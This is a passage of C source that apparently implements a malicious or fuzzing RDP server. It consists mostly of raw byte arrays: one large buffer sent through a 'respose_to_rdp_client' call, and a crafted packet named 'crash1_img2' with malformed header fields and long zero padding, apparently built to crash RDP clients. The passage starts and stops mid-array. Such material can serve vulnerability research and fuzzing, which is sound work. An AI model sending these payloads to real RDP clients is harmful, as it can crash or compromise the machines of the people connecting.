0b,0x24,0x3f,0x8e,0xfc,0xb5,0xc7,0xb0,0x12,0x84,0x01,0xc6,0xf0,0x51,0x7d,0x61,0x19,0x71,0x34,0x47,0x82,0x54,0x74,0x51,0x8f,0x91,0x97,0x50,0x78,0xf2,0xe5,0x7c,0x6a,0x31,0x14,0xe7,0x97,0x88,0x3c,0x2b,0xf5,0xf2,0x00,0x0a,0xf5,0x98,0x70,0x82,0x8f,0xf5,0x5e,0x0a,0xa6,0x8f,0x42,0x83,0xf0,0x26,0x53,0xe7,0x57,0xde,0xc3,0xd5,0x60,0x00,0xfc,0x0d,0x07,0x3e,0x09,0xcb,0x98,0xa0,0x00,0x43,0x98,0x83,0xf2,0x61,0x80,0xf0,0xc1,0x00,0x00,0xff,0x47,0x3f,0x56,0x01,0xc0,0x30,0x17,0xbc,0x78,0x32,0xba,0x11,0x01,0x80,0x02,0x78,0x62,0xbc,0x5f,0x1d,0x07,0x80,0xa0,0x01,0x77,0xde,0x83,0x00,0x50,0x00,0xab,0xef,0x43,0x07,0xdb,0x38,0xe0,0x0e,0x60,0x01,0x0b,0x4f,0x25,0x94,0xe3,0x84,0xf9,0x80,0x64,0x00,0x02,0xe0,0x8e,0x02,0x40,0x28,0x23,0x09,0xf7,0x2b,0xe1,0xcf,0x09,0xfa,0xe7,0x01,0x1d,0xf7,0x34,0x2b,0x06,0xbe,0x84,0xf2,0x7e,0x60,0x4c,0x79,0xf8,0xb7,0xc1,0xb1,0x02,0x10,0x08,0xbe,0x83,0xb5,0x00,0x00,0x09,0xdf,0x86,0x7c,0x66,0xff,0x50,0x00,0x05,0xc8,0xca,0xc6,0x7d,0x12,0xf7,0x1d,0x7c,0x68,0xbf,0xdf,0xf9,0x45,0x84,0x38,0x4c,0x3c,0x47,0x3f,0x15,0xc4,0x92,0x07,0xeb,0x1c,0xa6,0xdf,0x31,0xf0,0xd0,0x05,0xee,0x07,0x91,0xf2,0x48,0x1c,0xc1,0x60,0x10,0x83,0x8f,0xeb,0xe6,0xbe,0x1c,0x73,0x29,0x80,0x81,0x0a,0x4c,0xca,0x28,0x08,0x53,0x80,0xd3,0x60,0x47,0x81,0x2b,0xcf,0x8f,0xb5,0x1f,0x11,0xe3,0x28,0xf8,0x91,0xd5,0xf7,0x0c,0x06,0x38,0x06,0x7d,0x4d,0x6b,0x03,0x6e,0x14,0x92,0xb9,0x00,0x00,0x60,0xd3,0x38,0xe1,0xaa,0xe4,0x43,0x22,0x65,0x40,0x78,0x0b,0xc8,0x91,0x7d,0x00,0x02,0xbf,0x0d,0xf9,0xae,0xc3,0xef,0xc2,0x17,0xe1,0xdf,0x99,0x61,0xbf,0x30,0x3f,0xf3,0x2c,0x2f,0xe6,0x00,0x00,0x78,0xf3,0x48,0x55,0x40,0xcf,0xaa,0xc3,0x09,0xe6,0xbc,0x58,0xe3,0xe2,0x0b,0x13,0x44,0xe1,0xe4,0x00,0xe3,0xc6,0x08,0x13,0xf9,0xe1,0xde,0x00,0x20,0x91,0x3f,0x8a,0x15,0xe1,0x20,0x0a,0xf9,0x00,0x08,0x2f,0x34,0x80,0x21,0x68,0x00,0x2f,0x55,0x96,0x02,0xd1,0x8e,0x95,0x10,0x25,0x73,0x24,0xfe,0x88,0x87,0xb1,0x63,0xe2,0x57,0x01,0xa8,0xed,0xb5,0x1f,0x23,0x2e,0x0f,0x51,0x50,0x34,0xf1,0x4c,0x78,0x9c,0x00,0x01,0x0c,0xed,0x7b,0x1f,0x52,0x3e,0x46,0x5f,0xb2,0x82,0xe8,0xd8,0x4e,0x71,0x83,0x85,0x00,0xd0,0xaf,0xb5,0xc1,0xf4,0x20,0x32,0x0f,0xc8,0xd2,0xbe,0x34,0x7b,0x52,0x30,0x71,0x08,0x06,0xfa,0x5a,0x11,0xfb,0x39,0x42,0xf8,0x9e,0x3c,0x9d,0x5d,0xe5,0xa3,0x94,0x6c,0x71,0xfa,0x91,0xcb,0x39,0x5e,0x11,0x6a,0x8f,0x17,0x57,0x85,0x23,0xc8,0xd4,0x19,0xc8,0x82,0x45,0xb0,0x60,0x97,0x08,0x67,0x81,0x9f,0xb3,0x66,0xec,0x29,0xe8,0xc1,0x32,0xb3,0xe1,0xda,0xc0,0xf5,0x30,0x72,0x07,0x82,0x65,0x6b,0xca,0x71,0xf5,0xa3,0xc2,0x70,0x1d,0xd0,0x15,0xfe,0x72,0x0e,0xe0,0x16,0x08,0xc1,0x86,0x78,0x85,0xf0,0xf8,0x7e,0xc8,0xfd,0x11,0xee,0x78,0xfd,0x9b,0x60,0xa4,0x0c,0xb0,0x3d,0x34,0x85,0x61,0x63,0x58,0x40,0x01,0x40,0x0b,0xe1,0xa6,0xc0,0x56,0xd9,0x20,0xe1,0x47,0x29,0x80,0x76,0xa7,0x00,0xe1,0x65,0x89,0x04,0x05,0xfc,0x70,0x02,0x01,0xf8,0xb2,0x11,0x02,0x01,0xe5,0x96,0x03,0x0b,0xff,0xf6,0x19,0x82,0x01,0xdd,0x72,0xf3,0xfb,0xd1,0x84,0x46,0xc5,0xdf,0x7a,0xcb,0xef,0xf7,0xf2,0x6c,0x1b,0xf0,0xf2,0x8c,0x72,0x58,0xcb,0x92,0x86,0x1e,0x93,0x8f,0x89,0x5c,0xb2,0xb3,0xf2,0xe4,0x61,0x68,0xb9,0xc2,0xc0,0x36,0xb2,0x01,0x85,0x7e,0x69,0xd0,0x12,0x45,0xe4,0xc2,0x23,0xb8,0x00,0x48,0x68,0xfe,0x11,0x81,0x70,0xae,0x84,0x0f,0x33,0x30,0xb7,0xf2,0xa4,0x05,0xf6,0xa1,0x0a,0xaa,0x03,0xe3,0xc8,0x01,0x00,0x5e,0x00,0x17,0x00,0xea,0x03,0xea,0x03,0x01,0x00,0xff,0x02,0x46,0x0b,0x02,0x23,0x5e,0x00,0x11,0x21,0x03,0x00,0x1f,0x03,0x12,0x00,0x72,0x08,0x00,0x00,0xbc,0x81,0x20,0x81,0xc7,0xc2,0xc0,0x00,0x2b,0xc0,0x89,0x60,0xd2,0x7c,0x07,0x58,0x00,0x00,0x92,0x8a,0x03,0x00,0x51,0xaf,0xe0,0x63,0x80,0x7f,0xca,0x10,0xc7,0xc0,0xbf,0x94,0x01,0x00,0x01,0xdd,0xbc,0x05,0x57,0x90,0x31,0x10,0xa0,0x1c,0x11,0x80,0x00,0x03,0xad,0xf8,0xb6,0xab,0xc0,0x80,0x21,0xdc,0x50,0x5e,0x28,0x80,0x40,0x00,0x44,0x00,0x17,0x00,0xea,0x03,0xea,0x03,0x01,0x00,0xf7,0x02,0x4d,0x08,0x02,0x23,0x44,0x00,0x11,0x21,0x02,0x00,0x1c,0x05,0x12,0x00,0x8c,0x09,0x80,0x00,0x5d,0xc0,0x8f,0x81,0x68,0x43,0x1e,0x42,0x86,0xb1,0x40,0x40,0x0b,0xbc,0x78,0x0c,0x64,0x17,0xc2,0x10,0x8a,0x38,0x0b,0xe1,0x08,0x05,0x00,0x03,0xba,0x78,0x42,0xae,0xe0,0xdf,0x42,0x01,0x80,0x00,0x25,0x03,0x17,0x00,0xea,0x03,0xea,0x03,0x01,0x00,0x00,0x02,0x78,0x0a,0x02,0x23,0x25,0x03,0x11,0x21,0x02,0x00,0x8e,0xf9,0x49,0x4f,0x1b,0x00,0x00,0x82,0x80,0xb5,0x04,0x52,0x50,0x3f,0xd4,0x15,0x80,0xa8,0x00,0x49,0x4a,0x80,0xe3,0x5e,0x4a,0xa8,0xe8,0x3f,0x8e,0xa4,0x1c,0x00,0x04,0x7f,0xc6,0x0c,0x2e,0xf1,0x08,0x18,0x5d,0x20,0x02,0x01,0xdc,0xce,0x38,0x34,0x3d,0x72,0x01,0x40,0x0c,0x02,0xee,0x67,0xa7,0x86,0xa3,0xcf,0x42,0xdc,0x2f,0x9d,0x1c,0x18,0x85,0xe0,0x7c,0x09,0xfc,0xff,0x18,0x48,0x18,0x07,0x02,0xae,0x3e,0x04,0x1c,0x1e,0x2a,0x80,0x10,0x0f,0x8d,0x00,0x40,0x1f,0xda,0xfd,0xad,0x9f,0xd8,0x80,0x5f,0xbd,0x20,0xdf,0x7a,0xbd,0x09,0xc9,0xf9,0x63,0xfe,0xe3,0xe3,0x3f,0xb5,0xe0,0x66,0xe2,0x21,0x88,0x37,0x02,0x36,0x18,0xb0,0x8c,0x31,0x73,0xf1,0x7e,0x1c,0x73,0xa9,0x01,0xe1,0x91,0xa0,0x48,0x00,0x47,0x1f,0x80,0x94,0xf0,0x07,0xe8,0x45,0xbc,0x68,0x10,0x50,0x02,0x90,0x81,0x04,0x00,0x05,0x05,0x05,0x1c,0x80,0x48,0x60,0x6b,0xe3,0x97,0xf5,0xfe,0x41,0x28,0x15,0x7f,0x05,0x65,0x83,0x42,0x8f,0xcf,0x01,0x41,0x64,0x00,0x04,0x00,0x00,0xbf,0x09,0x1c,0x00,0x1c,0x00,0xb7,0x8d,0x71,0xaa,0xa8,0x20,0x09,0x16,0x18,0xe3,0x0e,0x20,0xf5,0x69,0x41,0x2d,0xe3,0x52,0xe1,0x20,0xb1,0x28,0x40,0x4d,0x00,0x2d,0x9c,0x26,0x09,0x08,0x09,0x0b,0x12,0x97,0x09,0x5b,0xc6,0x86,0x70,0x06,0x16,0x00,0x14,0xe1,0x28,0x40,0x89,0x93,0x23,0xbc,0x16,0x80,0x17,0x5e,0x86,0x41,0x1d,0xe0,0xa6,0x4c,0x90,0x81,0x19,0x70,0x90,0xec,0x10,0xac,0x48,0x49,0x92,0xac,0xb9,0x74,0x33,0xa0,0x05,0xb5,0x4b,0xa0,0x97,0x43,0x3a,0xb2,0xe1,0x93,0x21,0x58,0x90,0xec,0x0e,0x10,0x12,0xae,0xfb,0x53,0x2b,0x7d,0x99,0x91,0xc0,0xea,0x65,0x6a,0xef,0xb0,0x80,0x91,0xd8,0x13,0x38,0x4a,0xc3,0xeb,0xfb,0x90,0xdc,0x09,0x61,0xf5,0x9c,0x24,0x7a,0x02,0x6e,0xfb,0x40,0x0f,0x40,0x00,0xf8,0xe1,0xf8,0x08,0xbb,0xad,0x00,0x3c,0x8c,0x23,0xe3,0xb0,0x48,0x38,0x3e,0x81,0xef,0x14,0x06,0xee,0xe9,0x40,0x0f,0x61,0x00,0xf8,0xe1,0xf8,0x0d,0x5b,0xe5,0xab,0xe0,0x15,0xc2,0x1e,0x2c,0x6e,0x03,0x0f,0x87,0x20,0x00,0x10,0x19,0xb3,0xa1,0xff,0xc4,0x0f,0xd4,0x1f,0xf0,0xc0,0x13,0xea,0x3f,0xa3,0xe3,0x3e,0x1c,0x80,0x40,0x45,0xfc,0x34,0x5f,0x09,0xf8,0xe1,0xfa,0x82,0x01,0x07,0xf7,0x9f,0xbf,0x34,0x00,0xf0,0x03,0x8f,0xf4,0x37,0x82,0xd0,0x03,0xc8,0x00,0x2a,0x0c,0x18,0x3e,0x4e,0xbf,0x9d,0x7c,0x67,0xde,0x04,0x00,0x20,0x40,0x55,0xfe,0xf1,0x8c,0x63,0xe3,0x87,0xe0,0x2b,0x10,0xdf,0xd3,0x1f,0x1c,0x3f,0x01,0x78,0xf9,0x6b,0x00,0x47,0xc7,0x0f,0x7a,0x5e,0x21,0xb5,0x34,0x3a,0x00,0x69,0x03,0xc4,0x0e,0xa6,0x86,0xaf,0x0d,0xf4,0xc3,0xd8,0x21,0x16,0xca,0xb3,0xa5,0xcd,0x2e,0x80,0x16,0xc2,0x01,0x04,0xb9,0xa5,0xd5,0x9d,0x04,0x5b,0x3d,0x82,0x82,0x7b,0xbe,0x04,0x59,0x15,0xe1,0xb4,0x00,0xb4,0xba,0xb4,0x11,0x5e,0x1a,0x23,0xee,0xf5,0x3b,0xdd,0xeb,0x78,0xd5,0x38,0x48,0xaf,0x81,0x2c,0xdf,0xe3,0x9c,0x09,0x45,0x62,0x54,0xee,0x04,0xb1,0xdd,0x73,0x10,0xde,0x66,0x25,0x00,0x28,0x4e,0x02,0x58,0x80,0x50,0x02,0x3e,0x0d,0x2c,0x36,0xa1,0xad,0x50,0x02,0x41,0x86,0xdf,0x08,0x15,0x6b,0xfd,0xfe,0x98,0x22,0x27,0x04,0x11,0x13,0xf8,0x50,0x22,0x27,0x40,0x00,0xa0,0x61,0x2c,0xa3,0x08,0x03,0x9b,0x78,0x97,0x7c,0xd7,0x45,0x48,0x6f,0x12,0x6f,0x12,0xf9,0x19,0x5f,0xef,0xff,0x42,0x13,0x84,0x93,0xbe,0xa3,0xe3,0x47,0xc8,0xc2,0xff,0x7f,0xf9,0xd1,0xf1,0xa9,0x38,0x48,0x1a,0x02,0x9c,0x24,0x33,0x10,0x11,0x1b,0x11,0x1b,0xc2,0xb5,0xaf,0x8c,0xf9,0x51,0xf1,0x23,0xc1,0x11,0xf1,0x23,0xe6,0x40,0x88,0xd8,0x54,0x00,0x13,0xe4,0xc7,0xe3,0xc4,0x8c,0x44,0x8f,0xe6,0x3e,0x33,0xe4,0x61,0xf3,0xab,0xe3,0x50,0x89,0x19,0x8f,0xc2,0x8f,0xc4,0xf0,0x0c,0x5f,0xef,0xe6,0x3f,0x2a,0x7e,0xa4,0x7d,0x08,0x72,0x31,0x23,0x60,0x00,0x31,0x2b,0xa6,0x31,0x8c,0x41,0x14,0x8c,0xfe,0x14,0x29,0x19,0xaa,0x8f,0xdc,0x02,0x41,0xae,0xd7,0xac,0x15,0x7a,0x06,0xb6,0xdd,0x39,0x3e,0x4f,0x16,0x6a,0x81,0x80,0x91,0x73,0x57,0x71,0x66,0x04,0x0a,0x8f,0x80,0xdc,0x07,0xaf,0x46,0x20,0xc0,0x40,0x03,0xd7,0xa1,0x30,0xc0,0x8e,0x62,0x95,0xf9,0x68,0xd7,0xdb,0xb4,0x6f,0x7f,0xbf,0x96,0x71,0x8e,0x78,0x8a,0x3e,0x24,0x17,0x00,0xb0,0x28,0x60,0xb4,0xa0,0x77,0xd3,0xbe,0x15,0x60,0x0c,0x06,0xca,0x01,0xe0,0x62,0xfb,0xd1,0x7f,0xbf,0xa2,0x07,0xda,0x04,0x04,0x11,0x4b,0xac,0x02,0x20,0x04,0x02,0xa7,0xe0,0x3e,0x3f,0xce,0x11,0xc0,0xeb,0x30,0x00,0xe1,0x00,0x17,0x00,0xea,0x03,0xea,0x03,0x01,0x00,0x00,0x02,0x2b,0x01,0x02,0x23,0xe1,0x00,0x12,0x21,0xe8,0x90,0x8f,0x01,0x80,0x74,0x3e,0x5f,0x3c,0x4b,0x57,0xec,0x39,0xfa,0x8b,0x78,0x32,0x3e,0x25,0x28,0xc3,0x21,0xce,0x7f,0x0a,0x3e,0x25,0x36,0xb5,0xfc,0x28,0x6d,0x6b,0x30,0x82,0x7c,0x28,0x00,0x00,0xa9,0xc7,0x2e,0xf3,0xd6,0xc9,0xd5,0x5a,0x3f,0x77,0x9e,0x98,0x41,0x2a,0x71,0xc9,0xd5,0x5a,0x25,0x14,0xa7,0xbd,0xfc,0x48,0xa7,0xbd,0xfc,0x28,0xf8,0x91,0xf3,0xa2,0x25,0x14,0x9d,0x55,0xbf,0x06,0x0f,0xb6,0xf8,0x94,0x51,0xf6,0xdf,0xf0,0xa3,0xe2,0x57,0xce,0x80,0x68,0x0d,0x3d,0xee,0xcb,0xfe,0x60,0x16,0x02,0xfb,0x6f,0xb2,0xfe,0x28,0x05,0x6b,0x89,0x45,0x00,0xe0,0x37,0x79,0xed,0x30,0xa1,0x0a,0x0d,0x77,0x9e,0xa8,0xc3,0x3c,0x55,0x06,0x10,0x45,0x18,0x65,0x25,0xa5,0x2a,0x0f,0x12,0x8a,0x54,0xe3,0x9e,0x5c,0xa8,0x94,0x50,0x52,0x4b,0x81,0xba,0x10,0x9a,0x9c,0x73,0x03,0x82,0x61,0xd7,0x86,0x3e,0x24,0x60,0x0e,0x74,0x27,0xf4,0x40,0xa4,0x96,0xa7,0x1c,0x89,0x45,0x3e,0x14,0x7c,0xe8,0xfa,0xd0,0xa3,0x0c,0x89,0x45,0x14,0x61,0x93,0x69,0xaf,0x80,0xa9,0x47,0x08,0x1e,0xbc,0x04,0x80,0xa8,0xc3,0x03,0xbd,0xee,0xfa,0x94,0xea,0x40,0xcd,0xc1,0x82,0x00,0x00 };

	respose_to_rdp_client(img1, 5925);



	unsigned char crash1_img2[] = { 0x03, 0x00, 0x30, 0x00, 0x02, 0xF0, 0x80, 0x68, 0x00, 0x01, 0x03, 0xEB, 0x70, 0xAC, 0x5C, 0x0A,
		0x21, 0x17, 0x00, 0xEA, 0x03,
		 0xEA, 0x03, 0x01, 0x00, 0x29, 0x02, 0x8B, 0x00, 0x02, 0x00, 0x1D, 0x00, 0x00, 0x00, 0x65, 0x00,
		0x01, 0x03, 0x01, 0x00, 0x29, 0x0A, 0x74, 0xFF, 0xFF, 0xFD, 0x00, 0x02, 0xFF, 0xFF, 0x9D,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0